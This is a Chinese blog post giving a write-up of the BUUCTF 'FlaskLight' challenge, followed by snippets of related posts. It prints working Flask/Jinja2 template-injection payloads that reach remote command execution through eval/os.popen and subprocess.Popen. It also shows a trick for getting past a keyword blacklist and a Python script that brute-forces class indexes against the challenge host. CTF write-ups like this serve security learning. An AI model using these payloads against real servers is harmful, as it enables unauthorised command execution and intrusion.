BUUCTF WEB flasklight

于 2022-03-07 10:47:32 发布
阅读量597 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/123325025
版权

既然是flask框架,第一个想到的就是SSTI模板注入
之前也做过很多题了,审计源码,看到了

 <!-- Parameter Name: search -->
  <!-- Method: GET -->

带过去的是get的search参数,这页面有查询回显
那么就拿基础payload试一下

?search={{7*7}}

成功回显49,验证完毕,下面就是找过滤和绕过了
先看config

?search={{config.items()}}

没啥好用的,那就从’'里面一个一个往上找os,然后读吧
先找object
?search={{''.__class__.__mro__}},回显下标2是object
查看object的子类

?search={{''.__class__.__mro__[2].__subclasses__()}}

查找过后没有内置的os模块,这里有两个思路,一个是利用动态加载的__import__自己手动引
二是虽然没有给出os模块,但是给出了<class ‘subprocess.Popen’>,这样就可以通过子进程读取类来进行命令执行
第一种的payload:

?search={{''.__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

发现成功命令执行,因为global进了黑名单,所以需要通过拼接字符串的形式来进行绕过
第二种payload:

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

关于subprocess模块的用法,可以看
https://blog.csdn.net/CSDNcylinux/article/details/108375407
当然由于object所包含的子类太多,写个脚本来匹配计算下标比较好

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://9c9a1f11-3e2c-4c99-adf2-3481d0ee2e15.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))

参考视频链接:https://www.bilibili.com/video/BV1wL4y1u7Mq/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-10-12 buuctf Flasklight
shallowskyandsea的博客
10-12 143
Flasklight 打开题目,flask应该是ssti,但是没有输入点 查看源码发现参数search 试着传入?search={{7*7}} 发现存在ssti注入 构造payload: ?search={{[].__class__.__base__.__subclasses__()}} 编写脚本 import requests as res import time for i in range(0,400): url="http://...
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1528
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 979
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2698
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
[CSCCTF 2019 Qual]FlaskLight 记录
SopRomeo的博客
10-09 863
这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 存在sql注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{''.__class__.__mro__[2].__subclasses__()}} 利用这个可以读取所有的类,然后看看能不能RCE 找到catch_warnings类, 但是无法RCE 看了wp,发现可以利用subprocess.Popen这个类来进行RCE 学废了 网上搜的模板注入,都没
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2510
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
[CSCCTF 2019 Qual]FlaskLight
Sk1y的博客
01-13 259
[CSCCTF 2019 Qual]FlaskLight 文章目录[CSCCTF 2019 Qual]FlaskLight模板注入payload1payload2payload3参考文章 模板注入 搜索,返回查询内容 f12中提示,GET方式传参search可以判断ssti 查看所有子类 ?search={{''.__class__.__mro__[2].__subclasses__()}} 寻找可用子类,这里使用下python脚本来寻找可用类的序号 import requests import re
BUUCTF刷题记录(6)
bmth666的博客
05-14 4555
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 8692
1 注入原理 Flask 是python语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2550
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
关于flask的SSTI注入
Kr的博客
01-21 7099
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
NO.3-14 [CSCCTF 2019 Qual]FlaskLight
nigo134的博客
08-07 134
?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 for i in range(170, 1000): try: url = "http://...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值